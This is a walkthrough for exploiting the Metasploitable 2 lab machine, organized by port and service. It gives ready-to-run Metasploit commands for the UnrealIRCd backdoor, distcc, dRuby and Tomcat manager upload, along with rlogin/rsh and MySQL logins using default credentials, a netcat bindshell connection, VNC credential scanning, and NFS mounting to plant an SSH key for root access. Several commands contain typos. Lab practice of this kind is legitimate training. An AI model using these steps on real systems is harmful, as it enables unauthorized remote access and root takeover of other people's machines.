Port 6667 has the Unreal IRCD service running, we will exploit is using a backdoor that’s available in Metasploit.

This module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th, 2010.

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit (unix/irc/unreal_ircd_3281_backdoor) > set rhost 192.168.1.103
msf exploit (unix/irc/unreal_ircd_3281_backdoor) > exploit

Exploiting Port 36255

This is a weakness that allows arbitrary commands on systems running distccd. We will be using Distcc Daemon Command Execution. This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

msf > use exploit/unix/misc/distcc_exec
msf exploit (unix/misc/distcc_exec) > set rhost 192.168.1.103
msf exploit (unix/misc/distcc_exec) > exploit

Remote Login Exploitation

A remote login is a tool that was used before ssh came into the picture. Since we have the login credentials for Metasploitable 2, we will be using Rlogin to connect to it, using the “-l” flag to define the login name.

rlogin -l msfadmin 192.168.1.103

Metasploit has a module in its auxiliary section that we can use to get into the rlogin.

msf > use auxiliary/scanner/rservices/rlogin_login
msf auxiliary (scanner/rservices/rlogin_login) > set rhosts 192.168.1.103
msf auxiliary (scanner/rservices/rlogin_login) > set username root
msf auxiliary (scanner/rservices/rlogin_login) > exploit

Remote Shell Exploitation

Remote shell Protocol is another way to gain a remote shell, it is a legitimate service that we will use to access the target machine with login credentials to run a certain command.

rsh -l msfadmin 192.168.1.103 ifconfig

Exploiting Distributed Ruby Remote Code Execution (8787)

Now that we know that this service is running successfully, let’s try to exploit it using Metasploit.

This module exploits remote code execution vulnerabilities in dRuby.

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit (linux/misc/drb_remote_code) > set rhost 192.168.1.103
msf exploit (linux/misc/drb_remote_code) > exploit

Bindshell Exploitation

Metasploitable 2 comes with an open bindshell service running on port 1524. We will be using Netcat to connect to it.

nc 192.168.1.103 1524


Exploiting Port 5900 (VNC)

Virtual Network Computing or VNC service runs on port 5900, this service can be exploited using a module in Metasploit to find the login credentials.

This module will test a VNC server on a range of machines and report successful logins. Currently, it supports RFB protocol version 3.3, 3.7, 3.8 and 4.001 using the VNC challenge-response authentication method.

msf > use auxiliary/scanner/vnc/vnc_login
msf auxiliary (scanner/vnc/vnc_login) > set login 192.168.1.103
msf auxiliary (scanner/vnc/vnc_login) > exploit

Let’s put what we’ve found to the test by connecting using the vncviewer

vncviewer 192.168.1.103

The credentials work and we have a remote desktop session that pops up in Kali.

Access Port 2121 (ProFTPD)

We will connect to the target machine using Telnet running on port 2121 using the default credentials for Metasplotable 2.

telnet 192.168.1.103 2121

Exploiting Port 8180 (Apache Tomcat)

We saw during the service scan that Apache Tomcat is running on port 8180. Incidentally, Metasploit has an exploit for Tomcat that we can use to get a Meterpreter session. The exploit uses the default credentials used by Tomcat to gain access.

This module can be used to execute a payload on Apache Tomcat servers that have an exposed “manager” application. The payload is uploaded as a WAR archive containing a JSP application using a POST request against the /manager/html/upload component. NOTE: The compatible payload sets vary based on the selected target. For example, you must select the Windows target to use native Windows payloads.

msf > use exploit/multi/http/tomcat_mgr_upload
msf exploit (multi/http/tomcat_mgr_upload) > set rhost 192.168.1.103
msf exploit (multi/http/tomcat_mgr_upload) > set rpost 8108
msf exploit (multi/http/tomcat_mgr_upload) > set httpusername tomcat
msf exploit (multi/http/tomcat_mgr_upload) > set httppassword tomcat
msf exploit (multi/http/tomcat_mgr_upload) > exploit

Privilege Escalation via Port 2049: NFS

In this method, we will be creating an ssh key without a passphrase and exchanging it with the ssh key of the victim machine for the root user.

First, we use ssh-keygen to generate an RSA keypair without a key phrase, then we place it in the “/root/.ssh” folder where the key is found by default. Once the key is created and placed, we will create a directory “/tmp/sshkey/” in our local machine.

The next part is a little tricky, we will be mounting the directory we just made on the victim machine using the Network File Sharing Function. Once mounted we write the key from our machine to the victim’s machine, a sort of an override, using the cat command. The thing to keep in mind here is that the key we have is without a passphrase so the after the override the key in the victim machine is also without a passphrase, so when it is connected using ssh, it’s using a blank password.

The key is now copied so we unmount the directory and connect as the root user using ssh.

showmount -e 192.168.1.103
ssh-keygen
mkdir /tmp/sshkey
mount -t nfs 192.168.1.103:/ /tmp/sshkey/
cat ~/ .ssh/id_rsa.pub >>/tmp/sshkey/root/.ssh/authorized_keys
umount /tmp/sshkey
ssh root@192.168.1.103

Exploiting Port 3306 (MYSQL)

The MySQL database in Metasploitable 2 has negligible security, we will connect to it using the MySQL function of Kali by defining the username and host IP. The password will be left blank.

mysql -u root -h 192.168.1.103 -p

This article is a gateway into the world of pentesting. Its intent is to give you a single source containing all the ways and means to exploit all the vulnerabilities of Metasploiable 2 classified by port’s and services, it doesn’t get any better than this.


Referensi

Pranala Menarik